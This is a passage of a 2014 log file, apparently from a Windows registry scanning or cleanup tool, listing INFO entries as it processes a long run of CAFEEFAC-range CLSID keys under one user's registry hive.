[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0006-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0007-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0008-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0008-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0010-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0010-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0011-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0011-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0012-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0012-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0013-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0013-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0014-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0014-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0015-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0015-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0016-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0016-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0017-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0017-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0018-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0018-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0019-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0019-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0020-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0020-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0021-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0021-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0000-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0000-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0001-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0001-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0002-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0002-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0003-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0003-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0004-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0004-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0000-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0000-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0001-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0001-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0002-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0002-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0003-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0003-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0004-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0004-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0005-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0005-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0006-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0006-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0007-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0007-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0001-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0001-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0002-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0002-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0003-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0003-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0005-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0005-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0006-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0006-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0007-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0007-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0009-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0009-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0010-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0010-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0011-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0011-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0013-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0013-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0014-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0014-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0015-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0015-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0016-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0016-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0017-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0017-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0019-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0019-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0020-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0020-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0022-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0022-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0023-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0023-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0024-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0024-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0026-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0026-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0027-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0027-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0028-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0028-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0029-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0029-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0030-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0030-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0031-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0031-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0032-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0032-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0033-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0033-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0034-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0034-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0035-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0035-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0036-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0036-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0038-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0038-ABCDEFFEDCBB}]
